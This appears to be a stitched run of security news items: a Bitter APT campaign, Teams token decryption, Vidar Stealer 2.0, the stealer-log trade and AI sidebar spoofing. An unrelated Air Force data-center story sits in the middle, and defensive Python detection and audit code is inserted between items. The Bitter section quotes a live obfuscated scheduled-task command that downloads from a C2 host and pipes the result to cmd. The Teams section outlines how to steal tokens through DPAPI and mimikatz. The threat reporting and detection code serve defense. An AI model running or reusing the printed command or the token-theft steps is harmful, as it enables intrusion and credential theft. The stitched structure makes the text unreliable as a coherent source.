The Bitter APT group, also tracked as APT-Q-37 and known in China as 蔓灵花, has launched a sophisticated cyberespionage campaign targeting government agencies, military installations, and critical infrastructure across China and Pakistan.
The threat actor has deployed weaponized Microsoft Office documents that exploit a previously unknown zero-day vulnerability in WinRAR archive software to install custom C# backdoors on victim systems.
This multi-pronged attack demonstrates a significant evolution in the group’s technical capabilities and persistence mechanisms.
The campaign leverages two distinct infection vectors to deliver malicious payloads. The first method employs VBA macro-laden Excel files disguised as legitimate conference documentation, while the second exploits a WinRAR path traversal vulnerability predating CVE-2023-38088.
Both approaches ultimately deploy the same C# backdoor designed to exfiltrate sensitive data and execute arbitrary commands from remote servers.
The attackers carefully crafted their social engineering lures to target specific personnel within government and defense sectors, indicating prior reconnaissance and victim profiling.
Qianxin analysts identified the malicious activity in October 2024 after detecting anomalous network traffic patterns originating from compromised systems.
The researchers traced the infrastructure back to command-and-control servers hosted on the esanojinjasvc.com domain, which was registered in April 2024 specifically for this operation.
Analysis revealed that the backdoor communicates with multiple subdomains including msoffice.365cloudz.esanojinjasvc.com, employing sophisticated encryption techniques to evade network-based detection systems.
The attack chain begins when victims receive phishing emails containing malicious RAR archives with names like “Provision of Information for Sectoral for AJK.rar.”
Upon extraction with vulnerable WinRAR versions (7.11 or earlier), the archive exploits a path traversal flaw to overwrite the user’s Normal.dotm template file.
Incident overview (Source – Qianxin)
When Microsoft Word subsequently launches, it automatically loads the compromised template, triggering embedded macros that download and execute the winnsc.exe backdoor from the remote server koliwooclients.com using SMB network shares.
Persistence Mechanisms and Backdoor Functionality
The malware establishes persistence through multiple redundant mechanisms to ensure continued access.
The macro code implements a function called periperi() that creates a batch file named kefe.bat in the Windows Startup directory.
This script establishes a scheduled task titled “OneDrive\Updates1100988844” that executes every 26 minutes, making POST requests to hxxps://www.keeferbeautytrends.com/d6Z2.php.
The scheduled task command utilizes string obfuscation techniques (caret insertion and delayed environment-variable expansion) to evade signature-based detection:
s^ch^t^a^s^k^s /create /tn "OneDrive\Updates1100988844" /f /sc minute /mo 26 /tr "conhost --headless cmd /v:on /c set 765=ht& set 665=tps:& set 565=!765!!665!& curl !465!.com/d6Z2.p^h^p?rz=%computername%SS | c^m^d"
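The caret and `set`/`!var!` tricks in that command defeat naive string matching, so a detection rule has to normalize the command line first. The following Python is an added example (not code from the article or from Qianxin) that strips cmd.exe escape carets, resolves the delayed-expansion variables the command defines, and then applies a simple rule for task creation that downloads with curl and pipes into a shell. The sample input is the command quoted above plus one constructed benign task; the benign line and its paths are assumptions.

```python
import re

# Constructed sample: the obfuscated task-creation command quoted in the article,
# plus one constructed benign scheduled task to show the rule does not fire on everything.
SAMPLE_COMMANDS = [
    ('s^ch^t^a^s^k^s /create /tn "OneDrive\\Updates1100988844" /f /sc minute /mo 26 '
     '/tr "conhost --headless cmd /v:on /c set 765=ht& set 665=tps:& set 565=!765!!665!& '
     'curl !465!.com/d6Z2.p^h^p?rz=%computername%SS | c^m^d"'),
    'schtasks /create /tn "Backup\\Nightly" /sc daily /tr "C:\\Tools\\backup.exe"',
]

# `set NAME=value` assignments; the value ends at the next command separator or quote.
SET_RE = re.compile(r'set\s+(\w+)=([^&|"]*)')
VAR_RE = re.compile(r'!(\w+)!')


def strip_carets(cmd: str) -> str:
    """cmd.exe treats ^ as an escape character, so s^ch^t^a^s^k^s executes as schtasks.
    Dropping every caret is a normalization heuristic: it may also remove a caret that
    was meant literally inside quotes, which is acceptable for a detection pipeline."""
    return cmd.replace('^', '')


def expand_delayed_vars(cmd: str) -> str:
    """Resolve `set X=Y` assignments followed by !X! delayed-expansion references.
    Nested references such as !565! = !765!!665! settle after a few passes.
    Variables that are never assigned (e.g. !465! in the sample) are left untouched."""
    env = dict(SET_RE.findall(cmd))

    def sub(m):
        return env.get(m.group(1), m.group(0))

    for _ in range(5):  # bounded passes; nested references settle quickly
        env = {name: VAR_RE.sub(sub, value) for name, value in env.items()}
    return VAR_RE.sub(sub, cmd)


def normalize(cmd: str) -> str:
    """Full normalization: de-escape, expand variables, lowercase for matching."""
    return expand_delayed_vars(strip_carets(cmd)).lower()


def is_suspicious_task(cmd: str) -> bool:
    """Rule: schtasks /create whose action downloads content and pipes it into cmd."""
    n = normalize(cmd)
    creates_task = 'schtasks' in n and '/create' in n
    downloads = 'curl' in n or 'http' in n
    pipes_to_shell = re.search(r'\|\s*cmd', n) is not None
    return creates_task and downloads and pipes_to_shell


if __name__ == "__main__":
    for c in SAMPLE_COMMANDS:
        print(is_suspicious_task(c), normalize(c))
```

In a SIEM the same normalization would run before the match, since the raw process-creation event carries the obfuscated form; the reference `!465!` in the quoted command is never assigned and is therefore left as-is rather than guessed.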
The C# backdoor employs AES encryption for string obfuscation through a dedicated decryption function named gjfdkgitjkg().
This function decrypts critical configuration data including C2 URLs, file paths, and POST parameters.
The backdoor continuously collects system information including the temporary directory path, operating system architecture, and hostname, transmitting this data to hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxbds23.php.
Based on C2 server responses, the malware downloads additional executables, repairs their PE headers by adding the DOS signature {0x4D 0x5A}, validates the file structure, and executes them while reporting success or failure codes back to hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxcvg45.php.
Air Force officials want private companies to build artificial intelligence data centers on more than 3,000 acres of land on five of its military bases, raising questions about security, ethics, and land use.
The Air Force bases—Davis-Monthan in Ariz., Edwards in Calif., Robins in Ga., Joint Base McGuire-Dix-Lakehurst in N.J., and Arnold in Tenn.—will make “underutilized” land available “for private commercial data center use,” according to an Oct. 15 and Oct. 21 request for lease proposal from the service published online.
“AI is transforming the modern world, and these data centers are crucial for America to remain at the forefront of innovation,” Robert Moriarty, the Air Force’s deputy assistant secretary of installations, said in an unpublished news release provided to Defense One.
The lease proposal follows a late July executive order in which President Donald Trump promised a “golden age for American manufacturing and technological dominance” by offering up federal land for AI data centers. But a national security expert said the unprecedented deal could blur the lines between public and private partnerships—and may make it hard for the military to regain control of that land in the future.
“I have never heard of something like this before, where some of the public land was going to be leased to private companies to use,” said Stacie Pettyjohn, a senior fellow and director of the Defense Program at the Center for a New American Security think tank. “I think it is noteworthy … because it is potentially ceding land that the U.S. government will actually never get control over again.”
The vast majority of the land, 2,115 acres, is spread across seven sites at Edwards Air Force Base, home to many of the service’s test aircraft projects. Pettyjohn said a private company having access to those bases and nearby training exercises and test facilities is concerning.
“If you're letting a lot of people on the base, there is a lot of room for potential espionage, let alone sabotage or things like that,” Pettyjohn said. “It does seem to be purely commercial and transactional, and a part of the broader administration's policy towards blurring the lines between private and public which, in some ways, is what you see in authoritarian states like China.”
Spaces at the other bases in the proposal include 300 acres in Arizona, 219 acres in Georgia, 193 acres in New Jersey, and 274 in Tennessee. An Air Force spokesperson said the service will “ensure the proper security precautions are taken to protect the installation and its assets.”
The AI boom has driven a need for land as well as for more electrical power to fuel the data centers, underscoring the Pentagon’s rapid search for companies to field nuclear microreactors as a supply source.
For the Air Force’s proposal, the chosen developer would be responsible for supplying “sufficient power and water,” with interest given to water-efficient technology, the service spokesperson said.
Additionally, companies must submit a “mitigation and contingency plan to ensure the local communities’ utilities service life, resiliency, and capacity are not impacted,” the spokesperson said.
The government can purchase AI data center services and power from the project, but “is under no obligation to do so,” according to the lease proposal. Companies must offer “fair-market value” for the land and a payment of $250,000 to the government. The developer must also have a prior history and show proof they’ve built three AI data centers drawing at least 100 megawatts of new contracted power within the last three years.
Responses to the Air Force’s solicitation are due by Nov. 14 and the service will select winning lease proposals by January 2026.
“The Department of the Air Force is focused on swiftly, yet effectively, selecting an industry leader as a lease applicant,” said Benjamin Kindt, the Air Force’s chief of real estate development, in the unpublished news release.
SquareX released critical research exposing a new class of attack targeting AI browsers. The AI Sidebar Spoofing attack leverages malicious browser extensions to impersonate trusted AI sidebar interfaces in order to trick users into executing dangerous commands that can lead to credential theft, device hijacking, and password exfiltration.
The research demonstrates how attackers can exploit users’ trust in AI browser sidebars – the primary interface through which users interact with AI browsers like Comet, as well as consumer browsers with AI features like Brave and Edge. By creating pixel-perfect replicas of legitimate AI sidebars, malicious extensions return AI-generated responses that include harmful instructions that unsuspecting users follow.
“AI has become an essential tool for millions of users to learn new skills and complete tasks. Unfortunately, this has created a dangerous dynamic where people blindly follow AI-generated instructions without the expertise to identify security risks,” explains Vivek Ramachandran, Founder and CEO of SquareX. “With no visual or workflow difference, the AI Sidebar Spoofing attack exploits the trust users place on these AI interfaces, tricking them into performing malicious tasks that they may not fully understand or are aware of.”
SquareX illustrates the AI Sidebar Spoofing attacks with three main case studies, but warns that we will likely see many variants of the attack develop. In one example, the user asks the AI sidebar how to withdraw cryptocurrency from their account. The fake AI sidebar returns what looks like legitimate instructions but replaces the Binance login page URL with a phishing link. Believing the instructions were generated by Comet, the user enters their credentials on the phishing site, which the attacker then uses to log in to the victim’s account and access their cryptocurrency. In other examples, users were given false instructions to execute malicious commands that allowed attackers to exfiltrate passwords, hijack their device, and execute ransomware attacks remotely.
The researchers also showed that other AI browsers and consumer browsers implementing AI sidebars like Edge, Firefox and Safari are equally vulnerable to the AI Sidebar Spoofing Attack. This means that even if organizations restrict the use of AI browsers, users are still subject to these attacks as it can be operated on any browser with an AI sidebar.
Surprisingly, these attacks require only basic browser extension permissions, commonly found in popular extensions like Grammarly and password managers, making them difficult to detect by permission analysis alone. In fact, the AI Sidebar Spoofing extension can remain dormant, providing legitimate responses, until it sees an opportunity to trick users into doing something malicious based on their prompt. Thus, it is absolutely critical that enterprises have both the ability to perform dynamic analysis of extension behavior at run time and granular browser-native guardrails to warn and block users from following malicious instructions.
For more information, users can refer to the technical blog.
About SquareX
SquareX’s browser extension turns any browser on any device into an enterprise-grade secure browser, including AI Browsers. SquareX’s industry-first Browser Detection and Response (BDR) solution empowers organizations to proactively defend against browser-native threats including rogue AI agents, Last Mile Reassembly Attacks, malicious extensions and identity attacks. Unlike dedicated enterprise browsers, SquareX seamlessly integrates with users’ existing consumer browsers, delivering security without compromising user experience. More information about SquareX’s research-led innovation at www.sqrx.com.
A new technique allows hackers to extract encrypted authentication tokens from Microsoft Teams on Windows, enabling unauthorized access to chats, emails, and SharePoint files.
In a blog post dated October 23, 2025, Brahim El Fikhi explains how these tokens, stored in a Chromium-like Cookies database, can be decrypted using Windows’ Data Protection API (DPAPI).
This method bypasses recent security hardening, posing risks for lateral movement and data exfiltration in enterprise environments.
These access tokens grant impersonation capabilities, such as sending Teams messages or emails on behalf of victims, which attackers can exploit for social engineering or persistence.
El Fikhi’s focus on desktop Office apps, especially Teams, highlights vulnerabilities in embedded browser components that handle authentication via login.microsoftonline.com. Microsoft’s ecosystem remains a prime target, with recent disruptions noted in threats against Teams as of early October 2025.
Early Microsoft Teams versions stored auth cookies in plaintext within the SQLite file at %AppData%\Local\Microsoft\Teams\Cookies, a flaw exposed by Vectra AI in 2022 that allowed simple file reads to harvest tokens for Graph API abuse, bypassing MFA.
Updates eliminated this plaintext storage, adopting encrypted formats aligned with Chromium’s cookie protection to prevent disk-based theft.
However, the shift introduces new attack vectors. Tokens now use AES-256-GCM encryption protected by DPAPI, a Windows API that ties keys to user or machine contexts for data isolation.
This relies on the user’s login credentials, making decryption feasible with local access but challenging remotely without privilege escalation. Similar protections in browsers like Chrome have been cracked via key extraction, a pattern echoed in Teams’ msedgewebview2.exe process.
Microsoft Teams Access Tokens Exfiltrated
To pinpoint token locations, researchers employed ProcMon from SysInternals, filtering for WriteFile operations on msedgewebview2.exe, the embedded Edge WebView2 browser spawned by ms-teams.exe during login.
This process writes to the Cookies database, unlike the main executable, which avoids sensitive file I/O beyond logs.
The SQLite Cookies table holds critical entries: host_key (e.g., teams.microsoft.com), name (cookie identifier), and encrypted_value prefixed with “v10” (0x76 0x31 0x30), indicating Chromium’s version 10 encryption.
The schema parses as: 3-byte tag, 12-byte nonce (initialization vector), and the AES-encrypted payload. The master key is in %AppData%\Local\Packages\MSTeams_8wekyb3d8bbwe\LocalCache\Microsoft\MSTeams\EBWebView\Local State, a JSON file under os_crypt.encrypted_key—a Base64 string starting with “DPAPI” after decoding, protected by user-specific DPAPI blobs in %AppData%\Microsoft\Protect.
Extract and DPAPI-unprotect the key using Windows APIs like CryptUnprotectData, which requires the attacker’s context to match the user’s (e.g., via mimikatz for credential dumping).
Then, apply AES-256-GCM with the key and nonce to the payload, yielding the auth token. El Fikhi’s Rust PoC automates this, dumping tokens after ms-teams.exe is terminated, because the running process holds an exclusive lock on the Cookies file, a standard limitation. Python equivalents, like those written for Chrome, follow the same logic.
Such code, adapted from browser forensics, applies directly to Teams. A GitHub PoC (teams_dump) lists and decrypts the database, outputting JSON with hosts like teams.microsoft.com and cookies like MUIDB or TSREGIONCOOKIE.
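The storage layout described above (a `v10` tag, a 12-byte nonce and an AES-256-GCM payload in `encrypted_value`, with the master key DPAPI-wrapped under `os_crypt.encrypted_key` in Local State) is something a defender can audit without unwrapping anything. The Python below is an added example, not code from El Fikhi’s PoC or from Microsoft: it parses the cookie rows and the Local State key purely structurally and reports any entry that is not protected in the expected form, which is exactly the regression the 2022 plaintext finding would have surfaced. The SQLite rows and the Local State JSON are constructed in memory with dummy byte values; real data lives at the paths the article names.

```python
import base64
import json
import sqlite3

V10_TAG = b"v10"       # Chromium "version 10" prefix on encrypted_value (0x76 0x31 0x30)
NONCE_LEN = 12         # AES-GCM nonce that follows the tag
GCM_TAG_LEN = 16       # authentication tag AES-GCM appends to the ciphertext
DPAPI_TAG = b"DPAPI"   # prefix of the Base64-decoded os_crypt.encrypted_key


def build_sample_cookie_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the WebView2 Cookies database, modelling only
    the three columns the article discusses. Byte values are dummies, not real tokens."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cookies (host_key TEXT, name TEXT, encrypted_value BLOB)")
    good = V10_TAG + bytes(range(NONCE_LEN)) + b"\xaa" * 40 + b"\xbb" * GCM_TAG_LEN
    short = V10_TAG + b"\x00" * 5                      # truncated / corrupt entry
    plain = b"PLAINTEXT-TOKEN-constructed"             # the pre-2022 storage flaw
    conn.executemany("INSERT INTO cookies VALUES (?, ?, ?)", [
        ("teams.microsoft.com", "TSREGIONCOOKIE", good),
        ("teams.microsoft.com", "MUIDB", short),
        ("teams.microsoft.com", "legacy_auth", plain),
    ])
    return conn


def classify_value(blob: bytes) -> dict:
    """Parse the encrypted_value layout (3-byte tag, 12-byte nonce, GCM payload)
    without decrypting it, and report whether it is well-formed."""
    if not blob.startswith(V10_TAG):
        return {"scheme": "plaintext_or_unknown", "ok": False, "reason": "no v10 tag"}
    body = blob[len(V10_TAG):]
    if len(body) < NONCE_LEN + GCM_TAG_LEN:
        return {"scheme": "v10", "ok": False, "reason": "payload too short"}
    payload = body[NONCE_LEN:]
    return {"scheme": "v10", "ok": True, "ciphertext_len": len(payload) - GCM_TAG_LEN}


def audit_cookie_db(conn: sqlite3.Connection) -> list:
    """Return (host, name, scheme, reason) for every row that is not v10-protected."""
    findings = []
    rows = conn.execute("SELECT host_key, name, encrypted_value FROM cookies")
    for host, name, value in rows:
        c = classify_value(value)
        if not c["ok"]:
            findings.append((host, name, c["scheme"], c["reason"]))
    return findings


def local_state_key_is_dpapi_wrapped(local_state_json: str) -> bool:
    """Confirm os_crypt.encrypted_key is a DPAPI blob (Base64 text decoding to the
    'DPAPI' prefix), i.e. the master key is not stored in the clear. Unwrapping it would
    need CryptUnprotectData in the user's context; this check stops before that step."""
    state = json.loads(local_state_json)
    raw = base64.b64decode(state["os_crypt"]["encrypted_key"])
    return raw.startswith(DPAPI_TAG)


# Constructed Local State fragment; the bytes after "DPAPI" are filler, not a real blob.
SAMPLE_LOCAL_STATE = json.dumps({"os_crypt": {
    "encrypted_key": base64.b64encode(DPAPI_TAG + b"\x01\x00\x00\x00" + b"\x00" * 20).decode()
}})

if __name__ == "__main__":
    for finding in audit_cookie_db(build_sample_cookie_db()):
        print("FINDING:", finding)
    print("master key DPAPI-wrapped:", local_state_key_is_dpapi_wrapped(SAMPLE_LOCAL_STATE))
```

Run against a copy of the real database (the live file is locked by the Teams process, as noted above) the two findings a defender cares about are rows without the `v10` tag and a Local State key that does not decode to `DPAPI`; either means tokens are recoverable with a plain file read.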
Mitigations
Tools like GraphSpy ingest the token for scoped abuse, such as reading SharePoint or email, limited to the Teams app’s permissions (e.g., Chat.ReadWrite, Mail.Send). Microsoft’s Primary Refresh Token (PRT) ties into this, enabling seamless SSO but amplifying token reuse risks across apps.
Mitigations include monitoring for ms-teams.exe kills or unusual ProcMon patterns, enforcing app-bound encryption, and preferring web-based Teams to avoid local storage.
Rotate tokens via Entra ID policies and audit API logs for anomalies. As Teams threats evolve, DPAPI-aware EDR rules are essential.
A sophisticated information-stealing malware known as Vidar Stealer has undergone a complete architectural transformation with the release of version 2.0, introducing advanced capabilities that enable it to bypass Chrome’s latest security protections through direct memory injection techniques.
Released on October 6, 2025, by its developer “Loadbaks” on underground forums, this new iteration features a complete rewrite from C++ to pure C, implementing a multithreaded architecture that significantly enhances its data exfiltration speed and evasion capabilities.
The timing of Vidar 2.0’s emergence coincides with a notable decline in Lumma Stealer activity, positioning Vidar as a potential successor in the information stealer ecosystem.
Priced at $300 for lifetime access, the malware offers cybercriminals a cost-effective yet powerful toolset capable of systematically targeting credentials from browsers, cryptocurrency wallets, cloud services, gaming platforms, and communication applications including Discord and Telegram.
The malware’s enhanced anti-analysis measures and sophisticated credential extraction methods represent a concerning evolution in the information stealer threat landscape.
Vidar developer announcing the release of version 2.0 (Source – Trend Micro)
Vidar originally emerged in 2018 on Russian-language underground forums, initially leveraging the Arkei stealer source code.
Over the years, it has distinguished itself from competitors like Raccoon and RedLine through consistent updates supporting new browsers, wallets, and two-factor authentication applications.
Trend Micro analysts identified that the latest version introduces four significant architectural changes: a complete C language rewrite for enhanced stability and speed, a multithreaded system that dynamically scales based on victim computer specifications, advanced browser credential extraction capabilities, and an automatic polymorphic builder that generates unique binary signatures for each build.
The multithreaded architecture represents one of Vidar 2.0’s most significant enhancements, allowing the malware to perform data collection tasks across multiple parallel threads.
This system automatically adjusts performance by creating more worker threads on powerful systems and fewer threads on weaker machines, ensuring optimal operation without overwhelming the target.
The parallel processing significantly reduces the time the malware needs to remain active on compromised systems, making detection and intervention by security software substantially more challenging.
Chrome AppBound Encryption Bypass Through Memory Injection
Vidar 2.0’s most notable technical achievement involves its capability to bypass Chrome’s AppBound encryption protections through sophisticated memory injection techniques.
According to the developer, the malware has “implemented unique appBound methods that aren’t found in the public domain,” specifically targeting Chrome’s enhanced security measures designed to prevent unauthorized credential extraction by binding encryption keys to specific applications.
This represents a direct challenge to Chrome’s latest security enhancements aimed at protecting user credentials from information stealers.
The malware employs a tiered approach to browser credential extraction, initially attempting traditional methods such as systematic enumeration of browser profiles and extraction of encryption keys from Local State files using standard DPAPI decryption.
When these conventional techniques fail against Chrome’s AppBound encryption, Vidar 2.0 escalates to an advanced technique that launches target browsers with debugging enabled and injects malicious code directly into running browser processes using either shellcode or reflective DLL injection.
Vidar 2.0’s execution flow (Source – Trend Micro)
The injected payload operates entirely within browser memory, extracting encryption keys directly from the active process address space rather than attempting to decrypt them from storage.
This memory-based approach effectively circumvents Chrome’s AppBound encryption because it steals keys that are already decrypted and in use by the legitimate browser process.
The stolen encryption keys are then communicated back to the main malware process via named pipes, a technique that avoids creating disk artifacts that could be detected by forensic analysis or security software.
This dual-pronged extraction strategy targeting both traditional browser storage methods and Chrome’s latest protections across multiple browser platforms including Chrome, Firefox, Edge, and other Chromium-based browsers demonstrates the malware’s comprehensive approach to credential theft.
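The two tiers described above leave different telemetry: the first reads the browser’s Local State key file from a process that is not the browser, the second starts the browser with debugging enabled from an unexpected parent. The Python below is an added example, not Trend Micro’s or Vidar’s code, that runs one rule per tier over constructed process-create and file-access events. The article says only “debugging enabled”; keying the rule on Chromium’s `--remote-debugging-port` and `--remote-debugging-pipe` switches is this example’s assumption, as are the parent name `updater.exe` and the file paths.

```python
import re

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "firefox.exe"}
# Expected launchers of a browser: the shell, or a browser spawning its own children.
BENIGN_PARENTS = {"explorer.exe"} | BROWSERS
# Chromium's DevTools debugging switches (assumption: the article names no specific flag).
DEBUG_FLAG_RE = re.compile(r"--remote-debugging-(port|pipe)", re.I)
# The per-profile key store the article names for the tier-1 (DPAPI) technique.
LOCAL_STATE_RE = re.compile(r"\\Local State$", re.I)

# Constructed telemetry with the fields a process-create or file-access event carries.
SAMPLE_EVENTS = [
    {"type": "process", "image": "chrome.exe", "parent": "explorer.exe",
     "cmdline": '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --profile-directory=Default'},
    {"type": "process", "image": "chrome.exe", "parent": "updater.exe",
     "cmdline": '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9222'},
    {"type": "file", "image": "chrome.exe",
     "path": "C:\\Users\\u\\AppData\\Local\\Google\\Chrome\\User Data\\Local State"},
    {"type": "file", "image": "updater.exe",
     "path": "C:\\Users\\u\\AppData\\Local\\Google\\Chrome\\User Data\\Local State"},
]


def check_process_event(ev: dict):
    """Tier 2 indicator: a browser started with a debugging switch by an unexpected parent."""
    if ev["image"].lower() not in BROWSERS:
        return None
    if not DEBUG_FLAG_RE.search(ev["cmdline"]):
        return None
    if ev["parent"].lower() in BENIGN_PARENTS:
        return None
    return f"browser {ev['image']} launched with debugging enabled by {ev['parent']}"


def check_file_event(ev: dict):
    """Tier 1 indicator: a process other than the browser reading Local State."""
    if not LOCAL_STATE_RE.search(ev["path"]):
        return None
    if ev["image"].lower() in BROWSERS:
        return None
    return f"{ev['image']} accessed browser key store {ev['path']}"


def run_rules(events: list) -> list:
    """Apply the rule matching each event's type; return the list of alert strings."""
    alerts = []
    for ev in events:
        hit = check_process_event(ev) if ev["type"] == "process" else check_file_event(ev)
        if hit:
            alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

Legitimate automation (test harnesses, kiosk setups) also starts browsers with the debugging switches, so the parent-process condition is what keeps the tier-2 rule from being noisy; tune `BENIGN_PARENTS` to the launchers seen in your own environment.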
The stealer malware ecosystem has evolved into a sophisticated criminal enterprise capable of processing hundreds of millions of credentials daily.
Over the past several years, threat actors have transformed the landscape of credential theft through specialized malware families and underground distribution platforms.
These information-stealing operations now represent one of the most significant threats to digital security, with criminal networks establishing complex hierarchies to manage the harvest and distribution of stolen authentication data.
Recent investigations into the stealer log ecosystem have revealed an alarming scale of operations. A single Telegram account monitored by security researchers was observed ingesting as many as 50 million credentials within a 24-hour period.
The infrastructure supporting these operations has grown increasingly sophisticated, with threat actors utilizing messaging platforms, particularly Telegram, as their primary distribution channel.
These platforms serve as marketplaces where stolen data is bought, sold, and freely shared among criminal communities.
The criminal ecosystem operates through a tiered structure consisting of three primary groups. Primary sellers manage key operations and maintain both public channels where stealer logs are shared and paid private channels offering premium access to clients.
Early prototype of the initial project (Source – Synthient)
Aggregators collect stealer logs from multiple sources and redistribute them through their channels, often providing search capabilities for victims across specific sites.
Traffers work in cooperation with primary sellers to spread malware, occasionally operating their own channels to demonstrate their effectiveness.
Synthient analysts identified this hierarchical structure while monitoring the platforms and building systems to ingest shared data in hopes of helping victims.
The motivations driving these operations vary across groups. While primary sellers focus on monetizing stolen credentials through subscription models, aggregators often leak data publicly to gain attention and reputation within criminal communities.
This creates a complex web where the same stolen credentials may appear across multiple channels in various formats.
Some channels advertise access to billions of credential lines, with pricing models ranging from weekly subscriptions at 60 dollars to lifetime access for 600 dollars, demonstrating the commercialization of cybercrime.
The volume of credentials flowing through these channels has reached staggering proportions. Analysis of one major operation revealed that over the course of monitoring, researchers indexed approximately 30 billion Telegram messages and parsed 80 billion credentials.
During peak activity periods, the system processed 600 million credentials in a single day and indexed 1.2 billion messages within the same timeframe.
Technical Infrastructure and Data Formats
The technical implementation of stealer log distribution presents unique challenges for both criminals and researchers.
Threat actors employ multiple credential formats depending on the malware family and distribution method. The most common formats include simple combolist structures using delimiters such as colons, semicolons, or pipes to separate email addresses and passwords.
More sophisticated formats follow URL-Login-Password conventions, while stealer logs from actual malware infections contain structured data with labeled fields.
The inconsistency in data formats creates operational challenges for aggregators attempting to consolidate stolen credentials.
Synthient researchers noted that aggregators often merge multiple files from different resellers, creating what they described as “pseudo-unique abominations” that combine various credential formats.
This complexity is further compounded when primary sellers password-protect their archives with links to their channels, preventing aggregators from easily claiming credit for the data.
The technical hurdles require sophisticated parsing systems capable of identifying and processing credentials regardless of their original format or packaging method.
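As an added example of the parsing problem described in this section (not code from Synthient), the Python below normalizes the three formats the article names into one record shape: delimiter-separated combolists (`:`, `;`, `|`), URL-Login-Password lines, and labeled stealer-log fields. Delimiters are split from the left so a password that itself contains the delimiter survives, and the URL scheme’s `://` is skipped before splitting. Storing only a SHA-256 of the password rather than the plaintext is a design choice of this example for a victim-notification pipeline, not something the article describes; the sample dump is constructed and every address in it is fictitious.

```python
import re
from hashlib import sha256
from urllib.parse import urlparse

DELIMS = ":;|"
URL_RE = re.compile(r"^https?://", re.I)
LABEL_RE = re.compile(r"^(url|host|user|login|username|pass|password)\s*:\s*(.*)$", re.I)

# Constructed sample dump mixing the formats the article describes.
SAMPLE_DUMP = """\
alice@example.com:Winter2024!
bob@example.org;hunter2
carol@example.net|p|pe
https://mail.example.com/login:dave@example.com:s3cr:et
URL: https://shop.example.com/account
USER: erin
PASS: correct horse
"""


def _split_first(s: str, delims: str = DELIMS):
    """Split at the first delimiter only, so later delimiters stay in the password."""
    for i, ch in enumerate(s):
        if ch in delims:
            return s[:i], s[i + 1:]
    return s, None


def parse_line(line: str):
    """Parse one combolist or URL-Login-Password line into (url, login, password).
    Caveat: a port in the URL (host:8443) would be mis-split by a colon-delimited line."""
    line = line.strip()
    if not line:
        return None
    if URL_RE.match(line):
        scheme_end = line.index("://") + 3          # skip the scheme's own colon
        path, rest = _split_first(line[scheme_end:])
        if rest is None:
            return None
        login, password = _split_first(rest)
        if password is None:
            return None
        return line[:scheme_end] + path, login, password
    login, password = _split_first(line)
    if password is None:
        return None
    return None, login, password


def to_record(url, login, password) -> dict:
    """Normalized record; the password is hashed so the pipeline never stores it."""
    return {"url": url,
            "domain": urlparse(url).hostname if url else None,
            "login": login,
            "password_sha256": sha256(password.encode()).hexdigest()}


def parse_dump(text: str) -> list:
    """Walk a dump line by line, handling labeled multi-line stealer-log blocks
    (URL/USER/PASS) as well as single-line formats."""
    records, block = [], {}
    for raw in text.splitlines():
        m = LABEL_RE.match(raw.strip())
        if m:
            key, value = m.group(1).lower(), m.group(2).strip()
            if key in ("url", "host"):
                block["url"] = value
            elif key in ("user", "login", "username"):
                block["login"] = value
            else:                                    # pass / password closes the block
                if "login" in block:
                    records.append(to_record(block.get("url"), block["login"], value))
                block = {}
            continue
        parsed = parse_line(raw)
        if parsed:
            records.append(to_record(*parsed))
    return records


if __name__ == "__main__":
    for rec in parse_dump(SAMPLE_DUMP):
        print(rec)
```

The merged, re-packaged files the article calls “pseudo-unique abominations” are why the parser decides per line rather than per file: one archive routinely contains all three formats.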